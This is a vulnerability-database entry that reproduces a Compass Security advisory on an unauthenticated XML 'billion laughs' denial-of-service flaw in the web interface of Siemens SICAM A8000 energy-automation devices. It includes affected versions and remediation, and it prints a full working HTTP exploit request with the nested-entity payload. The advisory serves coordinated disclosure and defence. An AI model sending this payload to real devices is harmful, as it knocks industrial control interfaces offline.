Sign-up

ID

VAR-E-201901-0338


CVE

cve_id:CVE-2018-13798

Trust: 0.8

sources: BID: 106955 // PACKETSTORM: 151217

TITLE

Siemens SICAM A8000 Series Denial Of Service

Trust: 0.5

sources: PACKETSTORM: 151217

DESCRIPTION

Siemens SICAM A8000 Series suffers from an XML injection denial of service vulnerability.

Trust: 0.5

sources: PACKETSTORM: 151217

AFFECTED PRODUCTS

vendor:siemensmodel:sicam a8000 seriesscope: - version: -

Trust: 0.5

vendor:siemensmodel:sicam a8000 cp-8050scope:eqversion:1

Trust: 0.3

vendor:siemensmodel:sicam a8000 cp-802xscope:eqversion:13

Trust: 0.3

vendor:siemensmodel:sicam a8000 cp-802xscope:eqversion:12

Trust: 0.3

vendor:siemensmodel:sicam a8000 cp-802xscope:eqversion:11

Trust: 0.3

vendor:siemensmodel:sicam a8000 cp-8000scope:eqversion:13

Trust: 0.3

vendor:siemensmodel:sicam a8000 cp-8000scope:eqversion:12

Trust: 0.3

vendor:siemensmodel:sicam a8000 cp-8000scope:eqversion:11

Trust: 0.3

vendor:siemensmodel:sicam a8000 cp-8050scope:neversion:2

Trust: 0.3

vendor:siemensmodel:sicam a8000 cp-802xscope:neversion:14

Trust: 0.3

vendor:siemensmodel:sicam a8000 cp-8000scope:neversion:14

Trust: 0.3

sources: BID: 106955 // PACKETSTORM: 151217

EXPLOIT

#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#############################################################
#
# Product: SICAM A8000 Series
# Vendor: Siemens
# CSNC ID: CSNC-2019-002
# CVE ID: CVE-2018-13798
# Subject: SICAM Webinterface XXE DoS
# Risk: Medium (CVSS 3.0 Base Score: 5.3)
# CVSS 3.0: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:P/RL:O/RC:C
# Effect: Unauthenticated remotely exploitable
# Authors: Emanuel Duss <emanuel.duss@compass-security.com>
# Nicolas Heiniger <nicolas.heiniger@compass-security.com>
# Date: 2019-01-14
#
#############################################################

Introduction
------------

The Siemens SICAM A8000 RTU (Remote Terminal Unit) series is a modular device
range for telecontrol and automation applications in all areas of energy
supply. This device offers a web management interface for performing simple
management tasks.

During a penetration test, Compass found a denial-of-service vulnerability in
the Siemens SICAM web server. The web management interface is vulnerable
against the XXE billion laughs attack [2] using XML entities. Successful
exploitation can be performed unauthenticated over the network.

Affected
--------

* SICAM A8000 CP-8000 < V14
* SICAM A8000 CP-802X < V14
* SICAM A8000 CP-8050 < V2.00

Technical Description
---------------------

When a login on the web management interface is performed, the following
request is sent to the server:

POST /sicweb-ajax/auth HTTP/1.1
Host: 10.5.23.42
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.5.23.42
Content-Type: application/xml
Content-Length: 118
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Cmd_LogOn><authentication user="admin" pwd="P@ssw0rd"/><language id="en"/></Cmd_LogOn>

By modifying the XML message, it's possible to perform a billion laughs denial
of service attack against the web management interface:

POST /sicweb-ajax/auth HTTP/1.1
Host: 10.5.23.42
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.5.23.42/
Content-Type: application/xml
Content-Length: 1679
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE doc [
<!ENTITY c01 "badger">
<!ENTITY c02 "&c01; &c01; &c01; &c01; &c01; &c01; &c01; &c01; &c01; &c01;">
<!ENTITY c03 "&c02; &c02; &c02; &c02; &c02; &c02; &c02; &c02; &c02; &c02;">
<!ENTITY c04 "&c03; &c03; &c03; &c03; &c03; &c03; &c03; &c03; &c03; &c03;">
<!ENTITY c05 "&c04; &c04; &c04; &c04; &c04; &c04; &c04; &c04; &c04; &c04;">
<!ENTITY c06 "&c05; &c05; &c05; &c05; &c05; &c05; &c05; &c05; &c05; &c05;">
<!ENTITY c07 "&c06; &c06; &c06; &c06; &c06; &c06; &c06; &c06; &c06; &c06;">
<!ENTITY c08 "&c07; &c07; &c07; &c07; &c07; &c07; &c07; &c07; &c07; &c07;">
<!ENTITY c09 "&c08; &c08; &c08; &c08; &c08; &c08; &c08; &c08; &c08; &c08;">
<!ENTITY c10 "&c09; &c09; &c09; &c09; &c09; &c09; &c09; &c09; &c09; &c09;">
<!ENTITY c11 "&c10; &c10; &c10; &c10; &c10; &c10; &c10; &c10; &c10; &c10;">
<!ENTITY c12 "&c11; &c11; &c11; &c11; &c11; &c11; &c11; &c11; &c11; &c11;">
<!ENTITY c13 "&c12; &c12; &c12; &c12; &c12; &c12; &c12; &c12; &c12; &c12;">
<!ENTITY c14 "&c13; &c13; &c13; &c13; &c13; &c13; &c13; &c13; &c13; &c13;">
<!ENTITY c15 "&c14; &c14; &c14; &c14; &c14; &c14; &c14; &c14; &c14; &c14;">
<!ENTITY c16 "&c15; &c15; &c15; &c15; &c15; &c15; &c15; &c15; &c15; &c15;">
<!ENTITY c17 "&c16; &c16; &c16; &c16; &c16; &c16; &c16; &c16; &c16; &c16;">
<!ENTITY c18 "&c17; &c17; &c17; &c17; &c17; &c17; &c17; &c17; &c17; &c17;">
<!ENTITY c19 "&c18; &c18; &c18; &c18; &c18; &c18; &c18; &c18; &c18; &c18;">
<!ENTITY c20 "&c19; &c19; &c19; &c19; &c19; &c19; &c19; &c19; &c19; &c19;">
]>
<Cmd_LogOn><authentication user="admin" pwd="P@ssw0rd"/><language id="en"/>&c20;</Cmd_LogOn>

The XML parser on the device tries to resolve the external entities. This will
consume all available memory and the web management interface does not respond
anymore.

If the web management interface is refreshed in the browser, the following
message appears:

The device is currently unreachable. Retrying to connect.

Other services on the device, like the one used by the ToolboxII for
configuring the device or the IEC104 service, will still work properly and are
not affected by this attack. Only the web management interface remains unusable
until the device is rebooted.

It's not possible to use XXE to read local or remote files using the SYSTEM
directive.

Vulnerability Classification
----------------------------

* CVSS v3.0 Base Score: 5.3
* CVSS v3.0 Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:P/RL:O/RC:C

Remediation
-----------

* SICAM A8000 CP-8000: Update to V14
* SICAM A8000 CP-802X: Update to V14
* SICAM A8000 CP-8050: Update to V2.00 or higher

Please see the Siemens advisory [3] for the download links.

As a workaround, it's also possible to restrict the access to the webserver on
port 80/tcp and 443/tcp using a firewall.

Acknowledgments
---------------

We thank Siemens for the coordinated disclosure.

Timeline
--------

2018-05-28: Vulnerability discovered by Emanuel Duss and Nicolas Heiniger
2018-05-28: Informed customer
2018-06-06: Initial vendor notification
2018-03-18: Vendor informed us that they will publish an advisory
2019-01-08: Siemens published advisory [3]
2019-01-11: Compass published advisory containing technical information

References
----------

[1] https://w3.siemens.com/smartgrid/global/en/products-systems-solutions/substation-automation/substation-automation/pages/sicam-a8000.aspx
[2] https://www.owasp.org/index.php/XML_Security_Cheat_Sheet#Billion_Laughs
[3] https://cert-portal.siemens.com/productcert/txt/ssa-579309.txt

Trust: 0.5

sources: PACKETSTORM: 151217

EXPLOIT HASH

LOCAL

SOURCE

md5: 94b83feccca12141f97e4a4996b14321
sha-1: cd97399115337630f338361e1b6f2ba60dafdd69
sha-256: 354a63d78ac4b5ab320b994b6c1ce672f98e673e216b330282677992fd04dbd8
md5: 94b83feccca12141f97e4a4996b14321

Trust: 0.5

sources: PACKETSTORM: 151217

PRICE

free

Trust: 0.5

sources: PACKETSTORM: 151217

TYPE

Failure to Handle Exceptional Conditions

Trust: 0.3

sources: BID: 106955

TAGS

tag:exploit

Trust: 0.5

tag:denial of service

Trust: 0.5

sources: PACKETSTORM: 151217

CREDITS

Nicolas Heiniger, Emanuel Duss

Trust: 0.5

sources: PACKETSTORM: 151217

EXTERNAL IDS

db:SIEMENSid:SSA-579309

Trust: 0.8

db:NVDid:CVE-2018-13798

Trust: 0.8

db:PACKETSTORMid:151217

Trust: 0.5

db:ICS CERTid:ICSA-19-038-01

Trust: 0.3

db:BIDid:106955

Trust: 0.3

sources: BID: 106955 // PACKETSTORM: 151217

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2018-13798

Trust: 0.5

url:https://ics-cert.us-cert.gov/advisories/icsa-19-038-01

Trust: 0.3

url:https://cert-portal.siemens.com/productcert/pdf/ssa-579309.pdf

Trust: 0.3

url:https://seclists.org/bugtraq/2019/jan/18

Trust: 0.3

url:https://support.industry.siemens.com/cs/search?search=a8000%20cp8000

Trust: 0.3

url:http://www.siemens.com/

Trust: 0.3

url:https://cert-portal.siemens.com/productcert/txt/ssa-579309.txt

Trust: 0.3

sources: BID: 106955 // PACKETSTORM: 151217

SOURCES

db:BIDid:106955
db:PACKETSTORMid:151217

LAST UPDATE DATE

2022-07-27T09:58:17.549000+00:00


SOURCES UPDATE DATE

db:BIDid:106955date:2019-01-08T00:00:00

SOURCES RELEASE DATE

db:BIDid:106955date:2019-01-08T00:00:00
db:PACKETSTORMid:151217date:2019-01-17T22:59:38